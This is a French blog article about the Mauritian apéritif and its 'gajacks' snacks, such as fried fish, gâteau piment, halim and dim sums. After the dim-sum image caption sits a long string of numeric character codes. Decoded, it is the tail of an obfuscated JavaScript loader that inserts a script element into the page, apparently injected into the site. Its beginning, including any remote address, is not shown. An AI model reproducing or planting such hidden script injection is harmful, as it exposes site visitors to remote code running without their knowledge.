L’Apéro Mauricienne


Les Mauriciens ont aussi leur petite tradition tout comme l’apéro traditionnel des Français. Lorsqu’il fait froid ou qu’il pleut, on aime bien se poser en terrasse en début de soirée avec des snacks et une bonne bière fraîche. Les longues conversations fusent tout en grignotant et on n’est pas prêt d’abandonner cette tradition qui perdure depuis des années.

Cela peut être pour marquer un joyeux événement, tel que le début d’un long week-end, une visite à des amis ou de la famille, ou alors juste pour le plaisir d’un bon moment partagé avec ses proches. La vedette de l’apéro à la mauricienne est bien évidemment les gajacks. On en trouve pour tous les goûts et tous les budgets; vous pouvez en profiter avec un verre de vin, un cuba libre ou encore une bonne bière fraîche locales.

gato-piment

On partage tous cette habitude et l’amour de la bonne cuisine, peu importe notre âge, notre genre ou notre culture. Même entre les repas, nous trouvons toujours avoir quelque chose à nous mettre sous la dent ou à accompagner notre tasse de thé. Puisqu’on n’a pas vraiment d’entrées dans la cuisine mauricienne, les gajacks font doublon – ils sont à la fois des apéritifs et des entrées à déguster avant le repas. Toutefois le caractère particulier c’est qu’à Maurice, les gens peuvent même en manger à l’heure du thé donc en plein milieu de l’après-midi.

La popularité des gajacks à Maurice est si ample qu’elle a même engendré l’expression typique créole - “enn gajack sa” qui sert à désigner en créole une tâche facile à réaliser. Bien qu’à la base, le gajack avait pour objectif d’absorber l’alcool ingurgité et d’aider à tenir debout le plus longtemps possible. De nos jours, même sans un verre de boisson alcoolisée, on savoure et apprécie ces mets délicieux.

Parmi les gajacks classiques, on peut retrouver des produits de mer, tels que de l’ourite safranée, le poisson frit (rouget, cordonnier, licorne), de coquillages comestibles à l’image des tecs-tecs ou les bétails qu’on aime déguster avec une sauce pimentée.

gajak-poisson-frire

La diversité et les saveurs ne manquent surtout pas en termes de mets. Dépendant des goûts et des plaisirs de chacun, on peut y trouve de tout, tel que le halim, que l’on mange avec des tranches de pain baguette à la française. La variété de beignets disponibles inclut le fameux gâteau piment, le gâteau arouille (boulettes de taro frites), le gateau brinzel (beignet d’aubergine) et l’incontournable gâteau pomme de terre (beignet de pomme de terre à la farine de pois chiche). D’ailleurs pour le goûter, nous sommes nombreux à accompagner notre tasse de thé à la vanille avec des gâteaux piments et du pain beurré.

Pour les gourmands, on peut aussi trouver des spécialités sino-mauriciennes tels que les œufs rôtis, les dimsums et les niouk yen (boulettes de chayote). Souvent savourées en apéro, ces spécialités sont vraiment délicieuses. Les gajacks sont indispensables dans la vie de tout bon Mauricien. Ces amuse-bouche savoureux font le bonheur de tous les foyers de l'île les jours de fête et les weekends.

dim-sum 101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,48,49,44,57,55,44,49,48,48,41,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,118,97,114,32,108,105,115,116,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,108,105,115,116,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,108,105,115,116,46,99,104,105,108,100,78,111,100,101,115,91,48,93,41,59,125));

Commentaires